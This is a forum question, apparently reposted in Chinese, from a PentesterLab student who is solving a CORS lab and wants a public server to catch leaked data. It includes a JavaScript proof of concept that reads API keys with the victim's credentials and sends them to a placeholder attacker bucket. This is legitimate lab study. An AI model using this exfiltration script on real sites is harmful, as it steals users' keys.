如何解决如何为渗透测试实验室启动我自己的公共网络服务器
我有 pentesterlab pro 许可证,目前正在尝试解决一个需要使用公共 IP 启动网络服务器的 CORS 实验室。我创建了 aws 帐户,尝试在 S3 上托管我的页面并启用日志记录。
<html>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST","http://api-ptl-ad42da05-c93d6931.libcurl.so//api/v1/keys");
xhr.withCredentials = true;
xhr.send()
var a = xhr.responseText;
var xhr2 = new XMLHttpRequest();
xhr2.open("GET","http://<aws bucket>/"+a,false);
xhr2.withCredentials=true;
xhr2.send();
</script>
</body>
</html>
不幸的是,S3 创建了大量日志,很难弄清楚为什么我的 POC 不工作。
在帮助视频中,它们直接运行在一些具有公共 IP 的服务器上,我想知道它们是怎么做的(见附图)。我基本上想将 xhr2 请求发送到某个公共服务器,在那里我可以托管我的此 html 代码并查看附加了密钥的 GET 请求。有人可以帮忙吗?
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
